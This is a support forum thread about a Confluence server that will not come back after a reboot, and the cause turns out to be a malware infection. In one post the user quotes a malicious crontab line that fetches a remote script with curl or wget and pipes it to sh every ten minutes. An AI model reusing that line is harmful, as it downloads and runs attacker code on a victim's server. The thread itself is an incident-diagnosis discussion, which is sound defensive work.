We have Confluence and Jira installed on the same server. We recently had to reboot the server. Jira works fine, but when we click on the Confluence url (http://ourip:8090/display/TEC/Development+Space) we get an error:
refused to connect.
ERR_CONNECTION_REFUSED
Can you help me find out what is causing this,, and how I can troubleshoot this?
thanks,Ken
Hi Ken,
My guess would be that Confluence wasn’t configured to start on boot (at all, or correctly).
https://confluence.atlassian.com/doc/start-and-stop-confluence-838416264.html should be a good start.
CCM
https://confluence.atlassian.com/confkb/confluence-does-not-start-due-to-spring-application-context-has-not-been-set-218278311.html?_ga=2.58775789.1359027429.1555727745-666530993.1550497952
@Ken Ducey list in this article may be the reason check it once!
Thanks, I started it from the command line, and it appears to start correctly but I cannot access it from my web browser. I checked the error files and they do not appear to contain any errors.
I started it using sudo sh start-confluence.sh and had no luck. I then switched to user confluence1 and used the same command without sudo (sh start-confluence.sh) and still cannot access it from the browser.
I am using the same url I have used multiple times before rebooting.
Any hints would be very much appreciated.
Ken
I did go through most of that list, however I am not receiving any of those error messages. It appears to start correctly, but I just can't access it from the browser..
Hey Ken,
I would be interested in knowing what version of Confluence you're on, and if your server is accessible over the internet. We recently saw an attack against a security vulnerability in most versions of Confluence that prevents Confluence from starting up on infected servers. I've written an article about it here that will be useful in determining if you are affected.
Have a look at let us know if you still need help after reading the article.
Thanks,Daniel | Atlassian Support
Thanks.
The server is http://t.hamlethub.com/ As you can see, you can access the server, in addition to being able to access Jira.
I am fairly certain we are using the most recent version of Confluence. I will read the article.
FWIW, the reason I rebooted the server is due to a message AWS sent me suggesting it had been hacked. We did have SSH port 22 open, and that is now closed. (message below)
"We've received a report(s) that your AWS resource(s) listed in the 'Affected resources' tab has been implicated in activity which resembles attempts to access remote hosts on the internet without authorization."
I am not sure this is related, but FYI.
Yikes!
The following was in my crontab:
*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh
I will use the kerberods remover as per your article.
If I reboot, will it kill any processes? I could not find any using the confluence user.
Thanks!
I am not great with linux. I only have Jira and Confluence installed on this server. I can have everyone log off
The malware checker found something in a file in the tmp folder. I am not sure which of the files in that folder are valid, and which may be malware. Is it possible to simply delete everything in that folder?
Thanks,
@Ken Ducey
You can just try -> Go to Confluence Installation directory and run bin/startup.sh
I did that, and it appeared to run with no errors. Yet the browser still gives me the message above. The ports are open. I do believe I was hit by the malware (see below), but not sure how to repair it after I remove the malware.
It looks like you're new here. Sign in or register to get started.